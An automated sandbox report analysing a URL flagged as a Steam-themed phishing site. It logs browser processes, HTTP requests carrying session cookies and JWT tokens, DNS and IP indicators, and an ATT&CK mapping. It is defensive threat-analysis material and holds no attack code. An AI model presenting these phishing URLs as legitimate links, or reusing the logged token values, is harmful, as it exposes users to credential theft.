Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://jcard50.ru/e

Overview

General Information

Sample URL:https://jcard50.ru/e
Analysis ID:1589675
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected non-DNS traffic on DNS port
HTML body with high number of embedded images detected
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,14714163173296110440,10901134644017132275,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 2136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jcard50.ru/e" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://jcard50.ru/eAvira URL Cloud: detection malicious, Label: phishing
Source: https://jcard50.ru/704a2a507555060f0d535d1a.jsAvira URL Cloud: Label: phishing
Source: https://jcard50.ru/704a2a5075550603Avira URL Cloud: Label: phishing
Source: https://jcard50.ru/704a2a507555061602505d340f445046Avira URL Cloud: Label: phishing
Source: https://jcard50.ru/704a2a507555060106436b0b12527a5d0a570803Avira URL Cloud: Label: phishing
Source: https://jcard50.ru/704a2a50755506000c594c1143057f6111412c207d07.woff2Avira URL Cloud: Label: phishing
Source: https://jcard50.ru/eHTTP Parser: Total embedded image size: 208933
Source: global trafficTCP traffic: 192.168.2.5:63276 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.5:63554 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.5:63590 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /e HTTP/1.1Host: jcard50.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /704a2a507555060f0d535d1a.js HTTP/1.1Host: jcard50.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
Source: global trafficHTTP traffic detected: GET /704a2a507555060106436b0b12527a5d0a570803 HTTP/1.1Host: jcard50.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
Source: global trafficHTTP traffic detected: GET /704a2a50755506000c594c1143057f6111412c207d07.woff2 HTTP/1.1Host: jcard50.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://jcard50.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://jcard50.ru/704a2a5075550603Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
Source: global trafficHTTP traffic detected: GET /704a2a507555060f0d535d1a.js HTTP/1.1Host: jcard50.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
Source: global trafficHTTP traffic detected: GET /704a2a507555060106436b0b12527a5d0a570803 HTTP/1.1Host: jcard50.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: jcard50.ru
Source: unknownHTTP traffic detected: POST /704a2a5075550603 HTTP/1.1Host: jcard50.ruConnection: keep-aliveContent-Length: 41Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
Source: chromecache_127.2.dr, chromecache_133.2.drString found in binary or memory: https://steamcommunity.com/favicon.ico
Source: chromecache_132.2.drString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo
Source: chromecache_132.2.drString found in binary or memory: https://www.hcaptcha.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 63621 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63621
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: classification engineClassification label: mal56.win@22/20@6/6
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,14714163173296110440,10901134644017132275,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jcard50.ru/e"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,14714163173296110440,10901134644017132275,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://jcard50.ru/e100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://jcard50.ru/704a2a507555060f0d535d1a.js100%Avira URL Cloudphishing
https://jcard50.ru/704a2a5075550603100%Avira URL Cloudphishing
https://jcard50.ru/704a2a507555061602505d340f445046100%Avira URL Cloudphishing
https://jcard50.ru/704a2a507555060106436b0b12527a5d0a570803100%Avira URL Cloudphishing
https://jcard50.ru/704a2a50755506000c594c1143057f6111412c207d07.woff2100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
jcard50.ru
104.21.32.1
truefalse
    unknown
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalse
      high
      www.google.com
      142.250.181.228
      truefalse
        high
        fp2e7a.wpc.phicdn.net
        192.229.221.95
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://jcard50.ru/704a2a507555060106436b0b12527a5d0a570803false
          • Avira URL Cloud: phishing
          unknown
          https://jcard50.ru/etrue
            unknown
            https://jcard50.ru/704a2a507555060f0d535d1a.jsfalse
            • Avira URL Cloud: phishing
            unknown
            https://jcard50.ru/704a2a5075550603false
            • Avira URL Cloud: phishing
            unknown
            https://jcard50.ru/704a2a50755506000c594c1143057f6111412c207d07.woff2false
            • Avira URL Cloud: phishing
            unknown
            https://jcard50.ru/704a2a507555061602505d340f445046false
            • Avira URL Cloud: phishing
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://steamcommunity.com/favicon.icochromecache_127.2.dr, chromecache_133.2.drfalse
              high
              https://www.hcaptcha.com/chromecache_132.2.drfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.21.32.1
                jcard50.ruUnited States
                13335CLOUDFLARENETUSfalse
                104.21.112.1
                unknownUnited States
                13335CLOUDFLARENETUSfalse
                239.255.255.250
                unknownReserved
                unknownunknownfalse
                142.250.181.228
                www.google.comUnited States
                15169GOOGLEUSfalse
                IP
                192.168.2.4
                192.168.2.5
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1589675
                Start date and time:2025-01-13 00:59:40 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 24s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:browseurl.jbs
                Sample URL:https://jcard50.ru/e
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal56.win@22/20@6/6
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.78, 173.194.76.84, 142.250.185.206, 142.250.184.206, 142.250.185.234, 172.217.23.106, 142.250.185.170, 142.250.186.74, 142.250.184.202, 142.250.186.138, 142.250.181.234, 216.58.206.42, 142.250.185.202, 172.217.16.138, 172.217.18.10, 142.250.186.42, 172.217.16.202, 142.250.186.170, 142.250.186.106, 142.250.185.106, 20.12.23.50, 192.229.221.95, 20.3.187.198, 172.217.18.14, 216.58.206.46, 172.217.16.206, 13.95.31.18, 142.250.184.238, 142.250.80.78, 74.125.0.102, 142.250.185.131, 34.104.35.123, 20.42.65.92, 184.28.90.27, 23.1.237.91, 13.107.246.45
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, clients2.google.com, redirector.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, r1---sn-t0aekn7e.gvt1.com, glb.sls.prod.dcat.dsp.trafficmanager.net, clients1.google.com, www.bing.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, r1.sn-t0aekn7e.gvt1.com, umwatson.events.data.microsoft.com, clients.l.google.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: https://jcard50.ru/e
                No simulations
                No context
                No context
                No context
                No context
                No context
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 23:00:35 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.9589064728541272
                Encrypted:false
                SSDEEP:48:8a7diTuueH1idAKZdA19ehwiZUklqehHy+3:8a8rgcy
                MD5:5D03CE6EF867958C18D4134828A10B05
                SHA1:805BFADED41659DD6949B5C91BC79DD1A09C791D
                SHA-256:5E396299355AB6E7E0F939EC45DF03C76ED4342C7FC91EDD3FD3FB5CE35DA98B
                SHA-512:C0C26E7E1727467D5B8EEB629E7E5C5CA97ECFBBB0B1E771CB509C46CA06B9BD7B92F16D58BA4476920B0A1601A626CAD5C8B83E62893E8212BD2D79620B7484
                Malicious:false
                Reputation:low
                Preview:L..................F.@.. ...$+.,.......,Ne..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.........../1......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. 